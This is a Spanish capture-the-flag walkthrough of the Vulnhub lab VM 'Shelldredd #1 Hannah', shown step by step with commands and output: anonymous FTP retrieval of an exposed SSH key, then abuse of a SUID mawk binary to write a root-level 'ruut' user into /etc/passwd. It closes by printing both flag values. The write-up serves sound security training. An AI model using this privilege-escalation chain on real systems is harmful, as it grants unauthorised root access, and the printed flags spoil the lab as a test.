[VULNHUB] Shelldreed #1 HANNAH

Hoy vamos a hackear la maquina de Vulnhub llamada Shelldreed #1 HANNAH. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/onsystem-shelldredd-1-hannah,545/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.108 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST Nmap scan report for 192.168.1.108 Host is up (0.00035s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.59 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA) | 256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA) |_ 256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds
    Despues de escanear los puertos vemos que solo tiene el servicio FTP y el SSH. Nos conectamos al FTP usando anonymous/anonymous para ver que encontramos...
    ~ > ftp 192.168.1.108 Connected to 192.168.1.108. 220 (vsFTPd 3.0.3) Name (192.168.1.108:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 0 115 4096 Aug 06 16:56 . drwxr-xr-x 3 0 115 4096 Aug 06 16:56 .. drwxr-xr-x 2 0 0 4096 Aug 06 16:54 .hannah 226 Directory send OK. ftp> ftp> cd .hannah 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Aug 06 16:54 . drwxr-xr-x 3 0 115 4096 Aug 06 16:56 .. -rwxr-xr-x 1 0 0 1823 Aug 06 16:54 id_rsa 226 Directory send OK.
    Vemos que dentro de .hannah hay un fichero id_rsa. Lo descargamos.
    ftp> get id_rsa local: id_rsa remote: id_rsa 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for id_rsa (1823 bytes). 226 Transfer complete. 1823 bytes received in 0.00 secs (1.6495 MB/s)
    Tiene pinta de ser una key ssh, asi que probamos a loguearnos como hannah usando dicha key.
    ~ > chmod 600 id_rsa ~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000 The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't be established. ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known hosts. Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Sep 5 09:20:42 2020 from 192.168.1.140 hannah@ShellDredd:~$
    Estamos dentro :)
  • user.txt
  • hannah@ShellDredd:~$ ls user.txt hannah@ShellDredd:~$ cat user.txt Gr3mMhbCpuwxCZorqDL3ILPn
  • Privilege Escalation
  • Exploramos el sistema para ver si vemos algun binario SUID que pueda ayudarnos con la escalada de privilegios.
    hannah@ShellDredd:~$ find / -perm -4000 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/umount /usr/bin/mawk /usr/bin/chfn /usr/bin/su /usr/bin/chsh /usr/bin/cpulimit /usr/bin/mount /usr/bin/passwd
    Vemos que esta "mawk" el cual podemos utilizar.... Vamos a crear un usuario en el fichero /etc/passwd con permisos de root, con ayuda de mawk. La password que usara nuestro usuario es "123", asi que preparamos su hash para ponerlo en nuestro fichero.
    ~ > openssl passwd -1 -salt new 123 $1$new$p7ptkEKU1HnaHpRtzNizS1
    Una vez tenemos la password que queremos utilizar, utilizamos mawk para agregar al fichero /etc/passwd una linea con el usuario que tendra privilegios de root y que utilizaremos!
    hannah@ShellDredd:~$ mawk -v LFILE=/etc/passwd 'BEGIN { print "ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> LFILE }'
    Tras ejecutar el comando, ya podemos loguearnos como "ruut".
    hannah@ShellDredd:~$ su ruut Password:123 root@ShellDredd:/home/hannah#
    Y ya somos root!
  • root.txt
  • root@ShellDredd:/home/hannah# cd /root root@ShellDredd:~# ls root.txt root@ShellDredd:~# cat root.txt yeZCB44MPH2KQwbssgTQ2Nof
  • End
  • Y con esto ya seriamos root de la maquina.